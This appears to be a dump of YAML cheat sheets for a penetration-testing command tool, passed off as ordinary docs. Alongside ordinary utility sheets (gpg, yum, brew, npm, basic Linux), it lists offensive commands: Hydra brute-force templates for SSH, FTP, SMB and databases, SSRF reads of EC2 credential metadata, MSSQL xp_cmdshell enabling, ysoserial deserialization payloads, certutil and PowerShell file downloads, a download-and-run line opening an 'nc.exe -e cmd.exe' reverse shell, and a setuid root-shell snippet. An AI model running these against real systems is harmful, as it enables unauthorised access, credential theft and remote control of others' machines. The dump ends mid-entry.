-------------------------------------------------------------------------------- 1 | name: Hydra 2 | tags: [bruteforce, access] 3 | data: | 4 | 5 | Hydra - ssh - userlist and password list - 22 6 | plateform/linux #target/remote #protocol/ssh #port/22 #cat/ATTACK/BRUTEFORCE-SPRAY 7 | 8 | ```bash 9 | hydra -L -P ssh 10 | ``` 11 | 12 | Hydra - ssh - user and password - 22 13 | plateform/linux #target/remote #protocol/ssh #port/22 #cat/ATTACK/BRUTEFORCE-SPRAY 14 | 15 | ```bash 16 | hydra -l -p ssh 17 | ``` 18 | 19 | Hydra - ssh - user=password - 22 20 | plateform/linux #target/remote #protocol/ssh #port/22 #cat/ATTACK/BRUTEFORCE-SPRAY 21 | 22 | ``` 23 | hydra -L -e s ssh 24 | ``` 25 | 26 | Hydra - ssh - null password - 22 27 | plateform/linux #target/remote #protocol/ssh #port/22 #cat/ATTACK/BRUTEFORCE-SPRAY 28 | 29 | ``` 30 | hydra -l -e n ssh 31 | ``` 32 | 33 | Hydra - ssh - password=reverseuser - 22 34 | plateform/linux #target/remote #protocol/ssh #port/22 #cat/ATTACK/BRUTEFORCE-SPRAY 35 | 36 | ``` 37 | hydra -L -e r ssh 38 | ``` 39 | 40 | Hydra - ssh - file "login:pass" format - 22 41 | plateform/linux #target/remote #protocol/ssh #port/22 #cat/ATTACK/BRUTEFORCE-SPRAY 42 | 43 | ``` 44 | hydra -C ssh 45 | ``` 46 | 47 | Hydra - ftp - 21 48 | protocol/ftp #port/21 #plateform/linux #target/remote #cat/ATTACK/BRUTEFORCE-SPRAY 49 | 50 | ``` 51 | hydra -L -P ftp 52 | ``` 53 | 54 | Hydra - smb - 445 55 | protocol/smb #port/445 #plateform/linux #target/remote #cat/ATTACK/BRUTEFORCE-SPRAY 56 | 57 | ``` 58 | hydra -L -P smb 59 | ``` 60 | 61 | Hydra - mysql - 3306 62 | protocol/mysql #port/3306 #plateform/linux #target/remote #cat/ATTACK/BRUTEFORCE-SPRAY 63 | 64 | ``` 65 | hydra -L -P mysql 66 | ``` 67 | 68 | Hydra - vnc - 5900 69 | protocol/vnc #port/5900 #plateform/linux #target/remote #cat/ATTACK/BRUTEFORCE-SPRAY 70 | 71 | ``` 72 | hydra -L -P vnc 73 | ``` 74 | 75 | Hydra - postgres - 5432 76 | protocol/postgres #port/5432 #plateform/linux #target/remote #cat/ATTACK/BRUTEFORCE-SPRAY 77 | 78 | ``` 79 | hydra -L -P postgres 80 | ``` 81 | 82 | Hydra - telnet - 23 83 | protocol/telnet #port/23 #plateform/linux #target/remote #cat/ATTACK/BRUTEFORCE-SPRAY 84 | 85 | ``` 86 | hydra -L -P telnet 87 | ``` 88 | 89 | = userlist: users.txt 90 | = passlist: pass.txt 91 | -------------------------------------------------------------------------------- /files/BruteForce/wordlist/cewl.yaml: -------------------------------------------------------------------------------- 1 | name: cewl 2 | tags: [wordlist, bruteforce, dict] 3 | data: | 4 | 5 | cewl - wordlist creation 6 | plateform/linux #target/remote #cat/RECON 7 | Build a custom wordlist scraping words from a website. 8 | 9 | ```bash 10 | cewl -w -d -m 11 | ``` 12 | -------------------------------------------------------------------------------- /files/BruteForce/wordlist/crunch.yaml: -------------------------------------------------------------------------------- 1 | name: 2 | tags: [] 3 | data: | 4 | % wordlist, bruteforce, dict 5 | 6 | crunch - generate wordlist hex 7 | plateform/linux #target/local #cat/UTILS 8 | ```bash 9 | crunch 0123456789ABCDEF -o 10 | ``` 11 | 12 | crunch - generate wordlist charset 13 | plateform/linux #target/local #cat/UTILS 14 | ```bash 15 | crunch -f /usr/share/crunch/charset.lst -o 16 | ``` 17 | 18 | crunch - generate wordlist Upper(,) lower(@)x3 numeric(%)x3 special(^)x1 19 | plateform/linux #target/local #cat/UTILS 20 | - @ will insert lower case characters 21 | - , will insert upper case characters 22 | - % will insert numbers 23 | - ^ will insert symbols 24 | 25 | ```bash 26 | crunch 8 8 -t -o 27 | ``` 28 | 29 | crunch - generate wordlist contain "password", 2 numbers and 1 special char 30 | plateform/linux #target/local #cat/UTILS 31 | ```bash 32 | crunch 8 8 -t password%%^ -o 33 | ``` 34 | -------------------------------------------------------------------------------- /files/Cloud/aws.yaml: -------------------------------------------------------------------------------- 1 | name: AWS 2 | tags: [aws] 3 | data: | 4 | 5 | SSRF in EC2 - List roles 6 | plateform/linux #target/remote #protocol/http #port/80 #cat/RECON 7 | ``` 8 | curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ 9 | ``` 10 | 11 | SSRF in EC2 - Dump roles 12 | plateform/linux #target/remote #protocol/http #port/80 #cat/RECON 13 | ``` 14 | curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ 15 | ``` 16 | 17 | -------------------------------------------------------------------------------- /files/Crypto/gpg.yaml: -------------------------------------------------------------------------------- 1 | name: gpg 2 | tags: [gpg] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/UTILS 6 | 7 | gpg version 8 | ``` 9 | gpg --version 10 | ``` 11 | 12 | gpg generate key 13 | ``` 14 | gpg --gen-key 15 | ``` 16 | 17 | list keys 18 | ``` 19 | gpg --list-keys 20 | ``` 21 | 22 | distribute public key to key server 23 | ``` 24 | gpg --keyserver --send-keys 25 | ``` 26 | 27 | export public key 28 | ``` 29 | gpg --output --export 30 | ``` 31 | 32 | import public key 33 | ``` 34 | gpg --import 35 | ``` 36 | 37 | encrypt document 38 | ``` 39 | gpg --output --encrypt --recipient 40 | ``` 41 | 42 | decrypt document 43 | ``` 44 | gpg --output --decrypt 45 | ``` 46 | 47 | make a signature 48 | ``` 49 | gpg --output --sign 50 | ``` 51 | 52 | verify signature 53 | ``` 54 | gpg --output --decrypt 55 | ``` 56 | 57 | clearsign documents 58 | ``` 59 | gpg --clearsign 60 | ``` 61 | 62 | detach signature 63 | ``` 64 | gpg --output --detach-sig 65 | ``` 66 | -------------------------------------------------------------------------------- /files/Database/mssql-exec-xpcmdshell.yml: -------------------------------------------------------------------------------- 1 | name: mssql-exec 2 | tags: [mssql,xpcmdshell,exec] 3 | data: | 4 | plateform/windows #target/local 5 | 6 | SQL Server xpcmdshell 7 | 8 | ``` 9 | EXEC sp_configure 'show advanced option', 1 10 | EXEC sp_configure reconfigure 11 | EXEC sp_configure 'xp_cmdshell', 1 12 | EXEC sp_configure reconfigure 13 | EXEC master.dbo.xp_cmdshell 'whoami' 14 | ``` -------------------------------------------------------------------------------- /files/Deserialization/ysoserial.net.yaml: -------------------------------------------------------------------------------- 1 | name: ysoserial.net 2 | tags: [.net, unserialize] 3 | data: | 4 | 5 | ysoserial.net - generate payload VIEWSTATE 6 | plateform/windows #target/local #cat/ATTACK/GENERATE_PAYLOAD 7 | ```cmd 8 | ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -EncodedCommand " --path="" --apppath="" --decryptionalg="3DES" --decryptionkey="" --validationalg="SHA1" --validationkey="" 9 | ``` 10 | 11 | ysoserial.net - calc.exe payload for Json.Net using ObjectDataProvider gadget. 12 | plateform/windows #target/local #cat/ATTACK/GENERATE_PAYLOAD 13 | ```cmd 14 | ysoserial.exe -f -g -o raw -c "" -t 15 | ``` 16 | 17 | 18 | -------------------------------------------------------------------------------- /files/Deserialization/ysoserial.yaml: -------------------------------------------------------------------------------- 1 | name: ysoserial 2 | tags: [java, unserialize ] 3 | data: | 4 | 5 | ysoserial java - generate payload 6 | plateform/linux #target/local #cat/ATTACK/GENERATE_PAYLOAD 7 | 8 | https://github.com/frohoff/ysoserial 9 | 10 | ```bash 11 | java -jar ysoserial.jar 'powershell.exe -EncodedCommand ' > 12 | ``` 13 | 14 | convert file to base64 one line 15 | plateform/linux #target/local #cat/UTILS 16 | 17 | ```bash 18 | iconv -f ASCII -t UTF-16LE | base64 | tr -d "\n" 19 | ``` 20 | 21 | = lib_payload : CommonsCollections1 22 | -------------------------------------------------------------------------------- /files/Files/Download/certutil.yaml: -------------------------------------------------------------------------------- 1 | name: certutil 2 | tags: [windows, download, certutil] 3 | data: | 4 | 5 | download with certutil 6 | plateform/windows #target/remote #cat/ATTACK/FILE_TRANSFERT 7 | ``` 8 | certutil.exe -urlcache -split -f http:/// 9 | ``` 10 | 11 | download with certutil (2) 12 | plateform/windows #target/remote #cat/ATTACK/FILE_TRANSFERT 13 | ``` 14 | certutil.exe -verifyctl -f -split h http:/// 15 | ``` 16 | # Base64 Encode 17 | 18 | certutil -encode inFileName OutFileName 19 | 20 | # Base64 Decode 21 | 22 | ceruttil -decode inFileName outFileName 23 | 24 | # Download File -------------------------------------------------------------------------------- /files/Files/Download/powershell.yaml: -------------------------------------------------------------------------------- 1 | name: powershell 2 | tags: [powershell, download] 3 | data: | 4 | 5 | Download with powershell 6 | plateform/windows #target/remote #cat/ATTACK/FILE_TRANSFERT 7 | ```powershell 8 | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "(New-Object System.Net.WebClient).DownloadFile('http:///','')" 9 | ``` 10 | 11 | Download and execute with powershell 12 | plateform/windows #target/remote #cat/ATTACK/FILE_TRANSFERT #cat/ATTACK/EXPLOIT 13 | ```powershell 14 | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile New-Object System.Net.WebClient.DownloadFile('','nc.exe'); nc.exe -e cmd.exe 15 | ``` -------------------------------------------------------------------------------- /files/Files/Server/server.yaml: -------------------------------------------------------------------------------- 1 | name: server 2 | tags: [server] 3 | data: | 4 | 5 | python Simple HTTP server 6 | plateform/linux #target/serve #cat/ATTACK/LISTEN-SERVE 7 | ```bash 8 | python -m SimpleHTTPServer 9 | ``` 10 | 11 | python3 Simple HTTP server 12 | plateform/linux #target/serve #cat/ATTACK/LISTEN-SERVE 13 | ```bash 14 | python3 -m http.server 15 | ``` 16 | 17 | php Simple builtin server 18 | plateform/linux #target/serve #cat/ATTACK/LISTEN-SERVE 19 | ``` 20 | php -S 0.0.0.0: 21 | ``` 22 | 23 | = lport : 8080 24 | -------------------------------------------------------------------------------- /files/Install/brew.yaml: -------------------------------------------------------------------------------- 1 | name: Brew 2 | tags: [] 3 | data: | 4 | plateform/mac #target/local #cat/UTILS 5 | 6 | update brew 7 | ``` 8 | brew update 9 | ``` 10 | 11 | upgrade brew 12 | ``` 13 | brew upgrade 14 | ``` 15 | 16 | get info for a package 17 | ``` 18 | brew info 19 | ``` 20 | 21 | get info for a cask 22 | ``` 23 | brew cask info 24 | ``` 25 | 26 | install a package 27 | ``` 28 | brew install 29 | ``` 30 | 31 | install a cask 32 | ``` 33 | brew cask install 34 | ``` 35 | 36 | uninstall a package 37 | ``` 38 | brew uninstall 39 | ``` 40 | 41 | uninstall a cask 42 | ``` 43 | brew cask uninstall 44 | ``` 45 | 46 | edit package 47 | ``` 48 | brew edit 49 | ``` 50 | 51 | edit cask 52 | ``` 53 | brew cask edit 54 | ``` 55 | -------------------------------------------------------------------------------- /files/Install/yum.yaml: -------------------------------------------------------------------------------- 1 | name: yum 2 | tags: [yum] 3 | data: | 4 | plateform/linux #target/local #cat/UTILS 5 | 6 | List all available packages 7 | ``` 8 | yum list available 9 | ``` 10 | 11 | List all installed packages 12 | ``` 13 | yum list installed 14 | ``` 15 | 16 | Info about package 17 | ``` 18 | yum info 19 | ``` 20 | 21 | Search in repository (packages and descriptions) 22 | ``` 23 | yum search 24 | ``` 25 | 26 | List all history actions (install, update and erase) 27 | ``` 28 | yum history list 29 | ``` 30 | 31 | Check updates for installed packages 32 | ``` 33 | yum check-update 34 | ``` 35 | 36 | Update all packages 37 | ``` 38 | yum update 39 | ``` 40 | 41 | Update spesific/individual package 42 | ``` 43 | yum update 44 | ``` 45 | 46 | Downgrade package 47 | ``` 48 | yum downgrade 49 | ``` 50 | 51 | Install a package from repository 52 | ``` 53 | yum install 54 | ``` 55 | 56 | Remove/delete package 57 | ``` 58 | yum remove 59 | ``` 60 | 61 | Install local rpm package 62 | ``` 63 | yum localinstall 64 | ``` 65 | 66 | Install security updates 67 | ``` 68 | yum update --security 69 | ``` 70 | 71 | List dependencies of package 72 | ``` 73 | yum deplist 74 | ``` 75 | 76 | Remove un-needed packages and dependencies 77 | ``` 78 | yum autoremove 79 | ``` 80 | 81 | Whatprovides package/file/binary 82 | ``` 83 | yum whatprovides 84 | ``` 85 | 86 | List currently enabled repositories 87 | ``` 88 | yum repolist 89 | ``` -------------------------------------------------------------------------------- /files/Language/Java/java.yaml: -------------------------------------------------------------------------------- 1 | name: Java 2 | tags: [java] 3 | data: | 4 | 5 | # RMI 6 | plateform/linux #target/remote #cat/ATTACK/EXPLOIT 7 | ``` 8 | msfconsole -x "use exploit/multi/misc/java_rmi_server" 9 | ``` 10 | -------------------------------------------------------------------------------- /files/Language/Java/keytool.yaml: -------------------------------------------------------------------------------- 1 | name: keytool 2 | tags: [java keytool, certificate, encryption] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/UTILS 6 | 7 | Generate a Java keystore and key pair 8 | ``` 9 | keytool -genkey -alias -keyalg RSA -keystore -keysize 10 | ``` 11 | 12 | Generate a certificate signing request (CSR) for an existing Java keystore 13 | ``` 14 | keytool -certreq -alias -keystore -file 15 | ``` 16 | 17 | Import a root or intermediate CA certificate to an existing Java keystore 18 | ``` 19 | keytool -import -trustcacerts -alias root -file -keystore 20 | ``` 21 | 22 | Import a signed primary certificate to an existing Java keystore 23 | ``` 24 | keytool -import -trustcacerts -alias -file -keystore 25 | ``` 26 | 27 | Generate a keystore and self-signed certificate 28 | ``` 29 | keytool -genkey -keyalg RSA -alias -keystore -storepass -validity -keysize 30 | ``` 31 | 32 | Check a stand-alone certificate 33 | ``` 34 | keytool -printcert -v -file 35 | ``` 36 | 37 | Check which certificates are in a Java keystore 38 | ``` 39 | keytool -list -v -keystore 40 | ``` 41 | 42 | Check a particular keystore entry using an alias 43 | ``` 44 | keytool -list -v -keystore -alias 45 | ``` 46 | 47 | Remove a certificate from a keystore 48 | ``` 49 | keytool -delete -alias -keystore 50 | ``` 51 | 52 | Change the password of a keystore 53 | ``` 54 | keytool -storepasswd -keystore -new 55 | ``` 56 | 57 | Export a certificate from a keystore 58 | ``` 59 | keytool -export -alias -file -keystore 60 | ``` 61 | 62 | List the trusted CA Certs from the default Java Trusted Certs Keystore 63 | ``` 64 | keytool -list -v -keystore $JAVA_HOME/jre/lib/security/cacerts 65 | ``` 66 | 67 | Import New Certificate Authority into the default Java Trusted Certs Keystore 68 | ``` 69 | keytool -import -trustcacerts -file -alias -keystore $JAVA_HOME/jre/lib/security/cacerts 70 | ``` 71 | -------------------------------------------------------------------------------- /files/Language/c.yaml: -------------------------------------------------------------------------------- 1 | name: C 2 | tags: [] 3 | data: | 4 | generate shell bash bin 5 | plateform/linux #target/local #cat/CODE/SAMPLE #cat/ATTACK/GENERATE_PAYLOAD 6 | 7 | ```bash 8 | echo 'int main(void){setreuid(0,0); system("/bin/bash"); return 0;}' > pwn.c; 9 | gcc pwn.c -o ; 10 | rm pwn.c 11 | ``` 12 | -------------------------------------------------------------------------------- /files/Language/javascript.yaml: -------------------------------------------------------------------------------- 1 | name: npm 2 | tags: [npm, node, js] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/UTILS 6 | 7 | initial new package 8 | ``` 9 | npm init 10 | ``` 11 | 12 | initial immediately a new package 13 | ``` 14 | npm init -y 15 | ``` 16 | 17 | install all dependencies packages 18 | ``` 19 | npm install 20 | ``` 21 | 22 | install all dev dependencies packages 23 | ``` 24 | npm install --save-dev 25 | ``` 26 | 27 | install a specified package 28 | ``` 29 | npm install 30 | ``` 31 | 32 | install a specified dev package 33 | ``` 34 | npm install --save-dev 35 | ``` 36 | 37 | install globally a specified package 38 | ``` 39 | npm install -g 40 | ``` 41 | 42 | nvm 43 | 44 | % nvm, node, js 45 | 46 | plateform/linux #target/local #cat/UTILS 47 | 48 | install a specified version of node 49 | ``` 50 | nvm install 51 | ``` 52 | 53 | list available versions 54 | ``` 55 | nvm ls-remote 56 | ``` 57 | 58 | use installed node's version 59 | ``` 60 | nvm use 61 | ``` 62 | 63 | set a node's version as default 64 | ``` 65 | nvm alias default 66 | ``` -------------------------------------------------------------------------------- /files/Language/nodejs.yaml: -------------------------------------------------------------------------------- 1 | name: nodejs 2 | tags: [whitebox, nodejs] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/CODE/WHITEBOX 6 | 7 | command execution 8 | ``` 9 | grep -rn --include "*.js" -e "^\(.*\s\|.*child_process.*|\)\(exec\|spawn\|eval\|execSync\|spawnSync\|execFileSync\)(" --color 10 | ``` 11 | 12 | require 13 | ``` 14 | grep -rn --include "*.js" -e "^\(.*\s\|\)\(require\)(" --color 15 | ``` 16 | 17 | # file 18 | ``` 19 | grep -rn --include "*.js" -e "^\(.*\s\|\)\(appendFile\|open\|readFile\|WriteFile\\|unlink\|rename\|formidable)(" --color 20 | ``` 21 | 22 | # unserialize 23 | ``` 24 | grep -rn --include "*.js" -e "unserialize(" --color 25 | -------------------------------------------------------------------------------- /files/Language/php.yaml: -------------------------------------------------------------------------------- 1 | name: php grep 2 | tags: [php, whitebox] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/CODE/WHITEBOX 6 | 7 | php grep include 8 | ``` 9 | grep -rn --include "*.php" -e "^\(.*\s\|\)\(include\|require\|virtual\|require_once\|include_once\)\(\s\|(\).*\\$" --color 10 | ``` 11 | 12 | php grep path traversal 13 | ``` 14 | grep -rn --include "*.php" -e "^\(.*\s\|\)\(readfile\|file_get_contents\|stream_get_contents\|show_source\|fopen\|file\|fpassthru\|gzopen\|gzfile\|gzpassthru\|readgzfile\)\(\s\|(\).*\\$" --color 15 | ``` 16 | 17 | php grep exec 18 | ``` 19 | grep -rn --include "*.php" -e "^\(.*\s\|\)\(eval\|popen\|pcntl_exec\|assert\|proc_open\|create_function\|call_user_func\|call_user_func_array\|exec\|shell_exec\|system\|passthru\|virtual\)([^)]*\\$" --color 20 | ``` 21 | 22 | php grep replace 23 | ``` 24 | grep -rn --include "*.php" -e "^\(.*\s\|\)\(preg_replace\|ereg_replace\|eregi_replace\|mb_ereg_replace\|mb_eregi_replace\)(.*\\$" --color 25 | ``` 26 | 27 | php grep unserialize 28 | ``` 29 | grep -rn --include "*.php" -e "^\(.*\s\|\)unserialize(.*\\$" --color 30 | ``` 31 | 32 | php grep ldap 33 | ``` 34 | grep -rn --include "*.php" -e "^\(.*\s\|\)ldap_search(.*\\$" --color 35 | ``` 36 | 37 | php grep xpath 38 | ``` 39 | grep -rn --include "*.php" -e "^\(.*\s\|\)xpath.*\\$" --color 40 | ``` 41 | 42 | php grep mail 43 | ``` 44 | grep -rn --include "*.php" -e "^\(.*\s\|\)mail(.*\\$" --color 45 | ``` 46 | 47 | php grep echo 48 | ``` 49 | grep -rn --include "*.php" -e "^\(.*\s\|\)\(echo\|printf\|print\)\(\s\|(\).*\\$" --color 50 | ``` 51 | 52 | php grep weak comparaison 53 | ``` 54 | grep -rn --include "*.php" -e "\(\\\$[^=]\|0\)\s*==\s*\(0\|\\\$[^=]\\)" --color 55 | ``` 56 | 57 | php grep entry points 58 | ``` 59 | grep -rn --include "*.php" -e "\(\$_GET\|\$_POST\|\$_FILES\|\$REQUEST\|\$_COOKIES\|\$_SESSION\|\$_SERVER\|\$_GLOBALS\)" --color 60 | ``` 61 | 62 | php grep callbacks 63 | ``` 64 | grep -rn --include "*.php" -e "^\(.*\s\|\)\(ob_start\|array_diff_uassoc\|array_diff_ukey\|array_filter\|array_intersect_uassoc\|array_intersect_ukey\|array_map\|array_reduce\|array_udiff_assoc\|array_udiff_uassoc\|array_udiff\|array_uintersect_assoc\|array_uintersect_uassoc\|array_uintersect\|array_walk_recursive\|array_walk\|assert_options\|uasort\|uksort\|usort\|preg_replace_callback\|spl_autoload_register\|iterator_apply\|register_shutdown_function\|register_tick_function\|set_error_handler\|set_exception_handler\|session_set_save_handler\|sqlite_create_aggregate\|sqlite_create_function\)(.*\\$" 65 | ``` 66 | 67 | php grep curl 68 | ``` 69 | grep -rn --include "*.php" -e "curl_exec" --color 70 | ``` 71 | 72 | php grep where or query 73 | ``` 74 | grep -rni --include "*.php" -e "\(where\|query\).*\\$" 75 | ``` 76 | 77 | php grep file not contain an auth file include 78 | ``` 79 | for f in *.php; do grep "/include/auth.php" $f || echo $f; done |grep -v include | grep -v require 80 | ``` 81 | 82 | php wrapper lfi 83 | ``` 84 | curl ?=php://filter/read=convert.base64-encode/resource=.php 85 | ``` 86 | -------------------------------------------------------------------------------- /files/Linux/crontab.yaml: -------------------------------------------------------------------------------- 1 | name: Crontab 2 | tags: [crontab, schedule] 3 | data: | 4 | 5 | List cron jobs 6 | plateform/linux #target/local #cat/UTILS 7 | ``` 8 | crontab -l 9 | ``` 10 | 11 | Edit cron job 12 | plateform/linux #target/local #cat/UTILS 13 | ``` 14 | crontab -e 15 | ``` -------------------------------------------------------------------------------- /files/Linux/grep.yaml: -------------------------------------------------------------------------------- 1 | name: grep 2 | tags: [grep] 3 | data: | 4 | 5 | grep classic 6 | 7 | ``` 8 | grep 9 | ``` 10 | 11 | grep without case 12 | 13 | ``` 14 | grep -i 15 | ``` 16 | 17 | grep with file found 18 | 19 | ``` 20 | grep -H 21 | ``` 22 | 23 | grep recursive on extension 24 | 25 | ``` 26 | grep -rn --include "*." 27 | ``` 28 | 29 | grep word A or B 30 | 31 | ``` 32 | grep -e "\(\|\)" 33 | ``` 34 | 35 | grep hash 36 | 37 | plateform/linux #target/local #cat/UTILS 38 | 39 | Extract md5 hashes ({32}) 40 | 41 | ``` 42 | egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{32}' > md5-hashes.txt 43 | ``` 44 | 45 | Extract sha1 ({40}) 46 | 47 | ``` 48 | egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{40}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{40}' > sha1-hashes.txt 49 | ``` 50 | 51 | Extract sha256({64}) 52 | 53 | ``` 54 | egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{64}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{64}' > sha256-hashes.txt 55 | ``` 56 | 57 | Extract sha512({128}) 58 | 59 | ``` 60 | egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{128}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{128}' > sha512-hashes.txt 61 | ``` 62 | 63 | Extract valid MySQL-Old hashes 64 | 65 | ``` 66 | grep -e "[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}" *.txt > mysql-old-hashes.txt 67 | ``` 68 | 69 | Extract blowfish hashes 70 | 71 | ``` 72 | grep -e "$2a\$\08\$(.){75}" *.txt > blowfish-hashes.txt 73 | ``` 74 | 75 | Extract Joomla hashes 76 | 77 | ``` 78 | egrep -o "([0-9a-zA-Z]{32}):(w{16,32})" *.txt > joomla.txt 79 | ``` 80 | 81 | Extract VBulletin hashes 82 | ``` 83 | egrep -o "([0-9a-zA-Z]{32}):(S{3,32})" *.txt > vbulletin.txt 84 | ``` 85 | 86 | Extract phpBB3-MD5 87 | ``` 88 | egrep -o '$H$S{31}' *.txt > phpBB3-md5.txt 89 | ``` 90 | 91 | Extract Wordpress-MD5 92 | ``` 93 | egrep -o '$P$S{31}' *.txt > wordpress-md5.txt 94 | ``` 95 | 96 | Extract Drupal 7 97 | ``` 98 | egrep -o '$S$S{52}' *.txt > drupal-7.txt 99 | ``` 100 | 101 | Extract old Unix-md5 102 | ``` 103 | egrep -o '$1$w{8}S{22}' *.txt > md5-unix-old.txt 104 | ``` 105 | 106 | Extract md5-apr1 107 | ``` 108 | egrep -o '$apr1$w{8}S{22}' *.txt > md5-apr1.txt 109 | ``` 110 | 111 | Extract sha512crypt, SHA512(Unix) 112 | ``` 113 | egrep -o '$6$w{8}S{86}' *.txt > sha512crypt.txt 114 | ``` 115 | 116 | 117 | Others grep 118 | 119 | plateform/linux #target/local #cat/UTILS 120 | 121 | Extract emails from file 122 | ``` 123 | grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" 124 | ``` 125 | 126 | Extract valid IP addresses 127 | ``` 128 | grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" 129 | ``` 130 | 131 | Extract passwords 132 | ``` 133 | grep -i "pwd\|passw" 134 | ``` 135 | 136 | Extract users 137 | ``` 138 | grep -i "user\|invalid\|authentication\|login" 139 | ``` 140 | 141 | Extract HTTP URLS 142 | ``` 143 | grep -i http | grep -shoP 'http.*?[" >]' > http-urls.txt 144 | ``` 145 | 146 | = file: file.txt 147 | -------------------------------------------------------------------------------- /files/Linux/i686-w64-mingw32-gcc.yaml: -------------------------------------------------------------------------------- 1 | name: Compile windows PE 32 2 | tags: [compile] 3 | data: | 4 | 5 | compile windows PE 32 executable on linux 6 | plateform/linux #target/local #cat/CODE/COMPILE 7 | 8 | ``` 9 | i686-w64-mingw32-gcc -lws2_32 -o 10 | ``` 11 | 12 | -------------------------------------------------------------------------------- /files/Linux/linux.yaml: -------------------------------------------------------------------------------- 1 | name: linux bash 2 | tags: [shell, linux] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/UTILS #cat/PRIVESC #cat/RECON 6 | 7 | Re-call last input with sudo 8 | ``` 9 | sudo !! 10 | ``` 11 | 12 | Help 13 | ``` 14 | help cd / help dir (...) 15 | ``` 16 | 17 | Finding Help 18 | ``` 19 | apropos directory / apropos search (...) 20 | ``` 21 | 22 | Define custom startup screen 23 | ``` 24 | sudo nano /etc/motd 25 | ``` 26 | 27 | Run a script as background process 28 | ``` 29 | & 30 | ``` 31 | 32 | List all running processes 33 | ``` 34 | ps -A 35 | ``` 36 | 37 | Kill a running process 38 | ``` 39 | killall 40 | ``` 41 | 42 | Get the current path 43 | ``` 44 | pwd 45 | ``` 46 | 47 | Get the current hostname 48 | ``` 49 | hostname 50 | ``` 51 | 52 | Get the current users 53 | ``` 54 | users 55 | ``` 56 | 57 | Show calendar 58 | ``` 59 | cal 60 | ``` 61 | 62 | Show today's date 63 | ``` 64 | date 65 | ``` 66 | 67 | Exit terminal 68 | ``` 69 | exit 70 | ``` 71 | 72 | show process command 73 | ``` 74 | ps -ef | grep apache | grep -v grep 75 | ``` 76 | 77 | Change group 78 | ``` 79 | chgrp 80 | ``` 81 | 82 | List directory contents by size 83 | ``` 84 | ls -Slrh 85 | ``` 86 | 87 | List all directory contents sorted by time edited reverse 88 | ``` 89 | ls -altr 90 | ``` 91 | 92 | List directory (wildcard matching) 93 | ``` 94 | ls *. 95 | ``` 96 | 97 | List all files of type 98 | ``` 99 | find . -name *. -print 100 | ``` 101 | 102 | Go back to previous directory 103 | ``` 104 | cd - 105 | ``` 106 | 107 | Make (empty) directory 108 | ``` 109 | mkdir 110 | ``` 111 | 112 | Remove (empty) directory 113 | ``` 114 | rmdir 115 | ``` 116 | 117 | Remove directory with all contents without prompt 118 | ``` 119 | rm -rf 120 | ``` 121 | 122 | Remove directory contents and keep directory 123 | ``` 124 | rm -rf * 125 | ``` 126 | 127 | Change directory 128 | ``` 129 | cd 130 | ``` 131 | 132 | Create symlink 133 | ``` 134 | ln -s 135 | ``` 136 | 137 | Update symlink 138 | ``` 139 | ln -sfn 140 | ``` 141 | 142 | Remove symlink 143 | ``` 144 | unlink 145 | ``` 146 | 147 | Make (empty) file 148 | ``` 149 | touch 150 | ``` 151 | 152 | Copy file 153 | ``` 154 | cp 155 | ``` 156 | 157 | Copy/Page folder with content 158 | ``` 159 | cp -a / 160 | ``` 161 | 162 | Move/Rename file 163 | ``` 164 | mv 165 | ``` 166 | 167 | Move/Rename file and prompt before overwriting an existing file 168 | ``` 169 | mv -i 170 | ``` 171 | 172 | Remove file 173 | ``` 174 | rm 175 | ``` 176 | 177 | Write to file (will overwrite existing content) 178 | ``` 179 | cat > 180 | ``` 181 | 182 | Search for a filename-(not content!) in the current directory 183 | ``` 184 | find 185 | ``` 186 | 187 | Search for a string inside all files in the current directory and subdrectories 188 | ``` 189 | grep -r * 190 | ``` 191 | 192 | Search and replace within file 193 | ``` 194 | sed -i s///g 195 | ``` 196 | 197 | MD5 hash for files 198 | ``` 199 | md5sum 200 | ``` 201 | 202 | MD5 hash for folders 203 | ``` 204 | tar c | md5sum 205 | ``` 206 | 207 | Encrypt file 208 | ``` 209 | openssl enc -aes-256-cbc -e -in -out 210 | ``` 211 | 212 | Decrypt file 213 | ``` 214 | openssl enc -aes-256-cbc -d -in -out 215 | ``` 216 | 217 | Access via ssh 218 | ``` 219 | @ 220 | ``` 221 | 222 | Copy file from server to local 223 | ``` 224 | scp @: 225 | ``` 226 | 227 | Copy file from local to server 228 | ``` 229 | scp @: 230 | ``` 231 | 232 | Escape files with spaces in name like this 233 | ``` 234 | \\\ 235 | ``` 236 | 237 | Show disc space 238 | ``` 239 | df -h 240 | ``` 241 | 242 | Show disc space (inodes) 243 | ``` 244 | df -i 245 | ``` 246 | 247 | Show disc space for current directory 248 | ``` 249 | du -hs 250 | ``` 251 | 252 | Current processes (also CPS usage) 253 | ``` 254 | top or htop 255 | ``` 256 | 257 | Show running php processes 258 | ``` 259 | ps aux | grep php 260 | ``` 261 | 262 | Monitor error log (stream as file grows) 263 | ``` 264 | tail error.log -f -n 0 265 | ``` 266 | 267 | Start appliction 268 | ``` 269 | xdg-open 270 | ``` 271 | 272 | Register variable 273 | ``` 274 | export = 275 | ``` 276 | 277 | Echo variable 278 | ``` 